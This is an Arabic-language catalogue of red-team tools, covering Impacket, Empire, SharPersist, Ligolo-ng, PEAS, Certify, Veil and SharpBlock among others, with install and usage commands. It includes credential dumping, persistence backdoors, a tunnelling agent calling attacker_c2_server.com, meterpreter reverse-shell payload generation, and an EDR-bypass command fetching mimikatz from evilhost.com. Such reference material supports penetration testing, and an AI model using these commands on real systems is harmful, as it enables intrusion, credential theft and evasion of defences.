توفر Impacket مجموعة من الروابط (bindings) بلغة بايثون على مستوى منخفض لبروتوكولات شبكة متنوعة، بما في ذلك SMB وKerberos وLDAP، بالإضافة إلى مكتبات على مستوى أعلى للتفاعل مع خدمات الشبكة وتنفيذ مهام محددة مثل تفريغ تجزئات كلمات المرور وإنشاء مشاركات الشبكة.
تتضمن أيضًا عددًا من أدوات سطر الأوامر التي يمكن استخدامها لتنفيذ مهام متنوعة مثل تفريغ قواعد بيانات SAM، وتعداد علاقات الثقة بالمجال، وكسر كلمات مرور Windows.
التثبيت:```bash python3 -m pip install impacket
**التثبيت: (مع أمثلة البرامج النصية)**
قم بتنزيل واستخراج [الحزمة](https://github.com/fortra/impacket)، ثم انتقل إلى مجلد التثبيت وقم بتشغيل...```bash
python3 -m pip install .
الاستخدام:```bash
secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL
netview.py domain/user:password -target 192.168.10.2
mssqlinstance.py 192.168.1.2
GetADUsers.py domain/user:password@IP
Great [cheat sheet](https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/) لاستخدام Impacket.

### [🔙](#tool-list)[Empire](https://github.com/EmpireProject/Empire)
Empire هو إطار عمل ما بعد الاستغلال (post-exploitation) يتيح لك إنشاء حمولات (payloads) لإنشاء اتصالات عن بُعد مع أنظمة الضحايا.
بمجرد تنفيذ الحمولة على نظام الضحية، فإنها تنشئ اتصالًا يعود إلى خادم Empire، والذي يمكن استخدامه بعد ذلك لإصدار الأوامر والتحكم في النظام المستهدف.
يتضمن Empire أيضًا عددًا من الوحدات والبرامج النصية المدمجة التي يمكن استخدامها لأداء مهام محددة، مثل تفريغ تجزئات كلمات المرور (password hashes)، والوصول إلى سجل Windows (Windows registry)، وتسريب البيانات (exfiltrating data).
**تثبيت:**```bash
git clone https://github.com/EmpireProject/Empire
cd Empire
sudo ./setup/install.sh
الاستخدام:```bash
./empire
list agents
list listeners
ورقة غش مفيدة للاستخدام من [HarmJoy](https://github.com/HarmJ0y).

### [🔙](#tool-list)[SharPersist](https://github.com/mandiant/SharPersist)
أداة استمرارية لنظام ويندوز مكتوبة بلغة C#.
يحتوي المشروع على [ويكي](https://github.com/mandiant/SharPersist/wiki).
**تثبيت: (ثنائي)**
يمكنك العثور على أحدث إصدار [هنا](https://github.com/mandiant/SharPersist/releases).
**تثبيت: (تجميع)**
- قم بتنزيل ملفات المشروع من [مستودع GitHub](https://github.com/mandiant/SharPersist).
- قم بتحميل مشروع Visual Studio واذهب إلى "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
- اذهب إلى "NuGet Package Manager" --> "Package Sources"
- أضف مصدر حزمة بعنوان URL "https://api.nuget.org/v3/index.json"
- قم بتثبيت حزمة Costura.Fody NuGet. الإصدار الأقدم من Costura.Fody (3.3.3) مطلوب، بحيث لا تحتاج إلى Visual Studio 2019.
- `Install-Package Costura.Fody -Version 3.3.3`
- قم بتثبيت حزمة TaskScheduler
- `Install-Package TaskScheduler -Version 2.8.11`
- يمكنك الآن بناء المشروع بنفسك!
**الاستخدام:**
يمكن العثور على قائمة كاملة بأمثلة الاستخدام [هنا](https://github.com/mandiant/SharPersist#adding-persistence-triggers-add).```
#KeePass
SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add
#Registry
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add
#Scheduled Task Backdoor
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
#Startup Folder
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add

Ligolo-ng هي أداة بسيطة وخفيفة وسريعة تسمح لمختبري الاختراق بإنشاء أنفاق من اتصال TCP/TLS عكسي باستخدام واجهة tun (دون الحاجة إلى SOCKS).
بدلاً من استخدام وكيل SOCKS أو معيدات توجيه TCP/UDP، يقوم Ligolo-ng بإنشاء مكدس شبكة في وضع المستخدم باستخدام Gvisor.
عند تشغيل خادم الترحيل/الوكيل، يتم استخدام واجهة tun، ويتم تحويل الحزم المرسلة إلى هذه الواجهة، ثم إرسالها إلى شبكة الوكيل البعيدة.
التثبيت: (تنزيل)
الملفات الثنائية المترجمة مسبقًا (Windows/Linux/macOS) متاحة على صفحة الإصدارات.
التثبيت: (بناء)
بناء ligolo-ng (يتطلب Go >= 1.17):```bash go build -o agent cmd/agent/main.go go build -o proxy cmd/proxy/main.go
GOOS=windows go build -o agent.exe cmd/agent/main.go GOOS=windows go build -o proxy.exe cmd/proxy/main.go
**الإعداد: (Linux)**```bash
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up
الإعداد: (ويندوز)
تحتاج إلى تنزيل برنامج تشغيل Wintun (المستخدم بواسطة WireGuard) ووضع ملف wintun.dll في نفس المجلد الذي يوجد به Ligolo (تأكد من استخدام البنية الصحيحة).
الإعداد: (خادم الوكيل)```bash ./proxy -h # Help options ./proxy -autocert # Automatically request LetsEncrypt certificates
**الاستخدام:**
_ابدأ تشغيل العامل على جهاز الكمبيوتر المستهدف (الضحية) (لا يلزم وجود صلاحيات!):_```bash
./agent -connect attacker_c2_server.com:11601
يجب أن تظهر جلسة على خادم الوكيل.``` INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"
استخدم الأمر session لتحديد الوكيل.```
ligolo-ng » session
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000
يمكن العثور على معلومات الاستخدام الكاملة هنا.

الصورة مأخوذة من https://github.com/nicocha30/ligolo-ng#demo
LinPEAS هي أداة تصعيد امتيازات مفصلة ومفيدة لإيجاد مسارات تصعيد الامتيازات المحلية على نقاط نهاية لينكس.
التثبيت والاستخدام:```bash curl -L "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" | sh

### [🔙](#tool-list)[WinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)
WinPEAS هي أداة ممتازة ومفصلة لتصعيد الامتيازات (privesc) لاكتشاف مسارات تصعيد الامتيازات المحلية على نقاط نهاية Windows.
**تثبيت + استخدام:**```bash
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")

التعداد الذكي لنظام لينكس هو أداة جيدة أخرى أقل إسهابًا لتصعيد الامتيازات في لينكس.
التثبيت + الاستخدام:```bash curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

### [🔙](#tool-list)[Certify](https://github.com/GhostPack/Certify)
Certify هي أداة بلغة C# لتعداد واستغلال سوء التكوين في خدمات الشهادات الخاصة بـ Active Directory (AD CS).
تم تصميم Certify لاستخدامها جنبًا إلى جنب مع أدوات وتقنيات الفريق الأحمر الأخرى، مثل Mimikatz وPowerShell، لتمكين المخترقين (red teamers) من تنفيذ أنواع مختلفة من الهجمات، بما في ذلك هجمات الوسيط (man-in-the-middle)، وهجمات انتحال الشخصية، وهجمات تصعيد الامتيازات.
**الميزات الرئيسية لـ Certify:**
- إنشاء الشهادات
- توقيع الشهادات
- استيراد الشهادات
- تعديل الثقة في الشهادات
**التثبيت: (التجميع)**
Certify متوافقة مع [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). افتح مشروع Certify [.sln](https://github.com/GhostPack/Certify)، واختر "Release"، ثم قم بالتجميع.
**التثبيت: (تشغيل Certify عبر PowerShell)**
إذا كنت ترغب في تشغيل Certify في الذاكرة عبر غلاف PowerShell، فقم أولاً بتجميع Certify ثم تحويل التجميع الناتج إلى base64:```bash
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Certify.exe")) | Out-File -Encoding ASCII C:\Temp\Certify.txt
يمكن بعد ذلك تحميل Certify في سكريبت PowerShell باستخدام ما يلي (حيث يتم استبدال "aa..." بسلسلة تجميع Certify المشفرة بـ base64):``` $CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))
يمكن بعد ذلك استدعاء الأسلوب Main() وأي وسائط على النحو التالي:```
[Certify.Program]::Main("find /vulnerable".Split())
يمكن العثور على تعليمات التجميع الكاملة هنا.
الاستخدام:```bash
Certify.exe find /vulnerable
Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:VulnTemplate /altname:localadmin
يمكن العثور على شرح كامل للمثال [هنا](https://github.com/GhostPack/Certify#example-walkthrough).

### [🔙](#tool-list)[Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1)
Get-GPPPassword هو سكريبت PowerShell جزء من مجموعة أدوات PowerSploit، وهو مصمم لاسترداد كلمات المرور للحسابات المحلية التي يتم إنشاؤها وإدارتها باستخدام تفضيلات نهج المجموعة (GPP).
يعمل Get-GPPPassword عن طريق البحث في مجلد SYSVOL على وحدة تحكم المجال عن أي ملفات GPP تحتوي على معلومات كلمة المرور. بمجرد العثور على هذه الملفات، يقوم بفك تشفير معلومات كلمة المرور وعرضها على المستخدم.
**التثبيت:**
اتبع [تعليمات التثبيت](https://github.com/A-poc/RedTeam-Tools#powersploit) الخاصة بـ PowerSploit من صفحة الأداة هذه.```bash
powershell.exe -ep bypass
Import-Module PowerSploit
الاستخدام:```bash
Get-GPPPassword
Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq

### [🔙](#tool-list)[Sherlock](https://github.com/rasta-mouse/Sherlock)
نص PowerShell للعثور بسرعة على تصحيحات البرامج المفقودة لثغرات رفع الامتيازات المحلية.
_يدعم:_
- MS10-015 : وضع المستخدم إلى الحلقة (KiTrap0D)
- MS10-092 : جدولة المهام
- MS13-053 : تجاوز سعة كومة Win32k NTUserMessageCall
- MS13-081 : صفحة NULL لـ TrackPopupMenuEx Win32k
- MS14-058 : إلغاء مرجع المؤشر الفارغ لـ TrackPopupMenu Win32k
- MS15-051 : ClientCopyImage Win32k
- MS15-078 : تجاوز سعة مخزن مؤقت لبرنامج تشغيل الخط
- MS16-016 : 'mrxdav.sys' WebDAV
- MS16-032 : مقبض تسجيل الدخول الثانوي
- MS16-034 : برامج تشغيل وضع النواة في Windows EoP
- MS16-135 : رفع الامتياز في Win32k
- CVE-2017-7199 : وكيل Nessus 6.6.2 - 6.10.3 رفع الامتياز
**التثبيت: (PowerShell)**```bash
# Git install
git clone https://github.com/rasta-mouse/Sherlock
# Load powershell module
Import-Module -Name C:\INSTALL_LOCATION\Sherlock\Sherlock.ps1
الاستخدام: (PowerShell)```bash
Find-AllVulns
Find-MS14058

_الصورة مستخدمة من https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/_
### [🔙](#tool-list)[واتسون](https://github.com/rasta-mouse/Watson)
واتسون هي أداة .NET مصممة لتعداد التحديثات الأمنية المفقودة (KBs) واقتراح استغلالات لثغرات تصعيد الامتيازات.
رائعة لتحديد التصحيحات المفقودة واقتراح استغلالات يمكن استخدامها لاستغلال الثغرات المعروفة من أجل الحصول على صلاحيات أعلى على النظام.
**التثبيت:**
استخدام [إصدار Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). افتح [مشروع Watson .sln](https://github.com/rasta-mouse/Watson)، اختر "Release"، وقم بالبناء.
**الاستخدام:**```bash
# Run all checks
Watson.exe

نص الصورة مأخوذ من https://github.com/rasta-mouse/Watson#usage
أداة تعتمد على C# تقوم بأتمتة عملية اكتشاف واستغلال اختطاف DLL في الملفات الثنائية المستهدفة.
يمكن تسليح المسارات المخترقة التي تم اكتشافها، أثناء المشاركة، لتجاوز أنظمة EDR.
التثبيت:
ملاحظة: يجب وضع المتطلبات الأساسية i و ii في دليل ImpulsiveDLLHijacks.exe نفسه.
معلومات البناء والإعداد:
ImpulsiveDLLHijack
وبالنسبة لـ DLL التأكيدية:
الإعداد: انسخ ملفات DLL التأكيدية (maldll32 و maldll64) في دليل ImpulsiveDLLHijack.exe ثم قم بتشغيل ImpulsiveDLLHijack.exe :))
تعليمات التثبيت من https://github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites
الاستخدام:```bash
ImpulsiveDLLHijack.exe -h
ImpulsiveDLLHijack.exe -path BINARY_PATH
يمكن العثور على أمثلة الاستخدام [هنا](https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples).

_صورة مأخوذة من https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples_
### [🔙](#tool-list)[ADFSDump](https://github.com/mandiant/ADFSDump)
أداة بلغة C# لتفريغ جميع أنواع الأشياء المفيدة من AD FS.
تم إنشاؤها بواسطة Doug Bienstock [@doughsec](https://twitter.com/doughsec) أثناء عمله في Mandiant FireEye.
صُممت هذه الأداة لتشغيلها بالتزامن مع ADFSpoof. سيقوم ADFSdump بإخراج جميع المعلومات اللازمة لتوليد رموز الأمان باستخدام ADFSpoof.
**المتطلبات:**
- يجب تشغيل ADFSDump تحت سياق مستخدم حساب خدمة AD FS. يمكنك الحصول على هذه المعلومات عن طريق تشغيل قائمة العمليات على خادم AD FS أو من مخرجات cmdlet Get-ADFSProperties. فقط حساب خدمة AD FS لديه الصلاحيات اللازمة للوصول إلى قاعدة بيانات التكوين. حتى مسؤول النطاق (DA) لا يمكنه الوصول إليها.
- يفترض ADFSDump أن الخدمة مهيأة لاستخدام قاعدة بيانات Windows الداخلية (WID). على الرغم من أنه من السهل دعم خادم SQL خارجي، إلا أن هذه الميزة غير موجودة حاليًا.
- يجب تشغيل ADFSDump محليًا على خادم AD FS، وليس على وكيل تطبيقات الويب لـ AD FS. لا يمكن الوصول إلى WID محليًا إلا عبر named pipe.
**التثبيت: (Compile)**
تم بناء ADFSDump باستخدام .NET 4.5 مع Visual Studio 2017 Community Edition. ببساطة افتح ملف المشروع .sln، اختر "Release"، ثم قم بالبناء.
**الاستخدام: (Flags)**```bash
# The Active Directory domain to target. Defaults to the current domain.
/domain:
# The Domain Controller to target. Defaults to the current DC.
/server:
# Switch. Toggle to disable outputting the DKM key.
/nokey
# (optional) SQL connection string if ADFS is using remote MS SQL rather than WID.
/database
مدونة - استكشاف هجوم SAML الذهبي ضد ADFS

الصورة مستخدمة من https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs
مُبهم لأوامر ونصوص PowerShell متوافق مع PowerShell v2.0+. إذا كان بإمكان نقطة نهاية الضحية تنفيذ PowerShell، فإن هذه الأداة رائعة لإنشاء نصوص مبهمة بشدة.
تثبيت:```bash git clone https://github.com/danielbohannon/Invoke-Obfuscation.git
**الاستخدام:**```bash
./Invoke-Obfuscation

Veil هي أداة لتوليد حمولات metasploit التي تتجاوز حلول مكافحة الفيروسات الشائعة.
يمكن استخدامها لتوليد شيل كود مشوش، راجع المدونة الرسمية لإطار عمل Veil لمزيد من المعلومات.
التثبيت: (Kali)```bash apt -y install veil /usr/share/veil/config/setup.sh --force --silent
**تثبيت: (Git)**```bash
sudo apt-get -y install git
git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
./config/setup.sh --force --silent
الاستخدام:```bash
./Veil.py -t Ordnance --list-payloads
./Veil.py -t Ordnance --list-encoders
./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234
./Veil.py -t Evasion --list-payloads
./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris
كتب منشئو Veil [منشور مدونة](https://www.veil-framework.com/veil-command-line-usage/) لطيفًا يشرح استخدام سطر الأوامر للذخيرة والتهرب بشكل أكبر.

### [🔙](#tool-list)[SharpBlock](https://github.com/CCob/SharpBlock)
طريقة لتجاوز وحدات DLL الخاصة بالإسقاط النشط لـ EDR عن طريق منع تنفيذ نقطة الدخول.
**الميزات:**
- يمنع تنفيذ نقطة دخول DLL الخاصة بـ EDR، مما يمنع وضع خطافات EDR.
- تجاوز AMSI بدون تصحيح (Patchless) لا يمكن اكتشافه من قبل الماسحات الضوئية التي تبحث عن تصحيحات كود Amsi.dll في وقت التشغيل.
- عملية مضيفة يتم استبدالها بـ PE محمل (implant) يمكن تحميله من القرص أو HTTP أو الأنبوب المسمى (Cobalt Strike).
- يتم إخفاء العملية المحملة للمساعدة في تجنب الماسحات الضوئية التي تبحث عن العمليات المجوفة.
- يتم تزييف وسائط سطر الأوامر وزرعها بعد إنشاء العملية باستخدام طريقة اكتشاف EDR خفية.
- تجاوز ETW بدون تصحيح.
- يمنع استدعاء NtProtectVirtualMemory عندما يكون المستدعي ضمن نطاق مساحة عنوان DLL محظور.
**التثبيت:**
استخدم [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/) لتجميع ثنائي SharpBlock.
افتح [مشروع SharpBlock .sln](https://github.com/CCob/SharpBlock)، اختر "Release"، وقم بالبناء.
**الاستخدام:**```bash
# Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL
SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
# Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL
execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi
منشور مدونة رائع من PenTestPartners هنا.

الصورة مأخوذة من https://youtu.be/0W9wkamknfM
Alcatraz هي أداة إخفاء ثنائي (obfuscator) بواجهة رسومية (GUI) لـ x64 قادرة على إخفاء ملفات PE مختلفة بما في ذلك:
بعض ميزات الإخفاء المدعومة تشمل: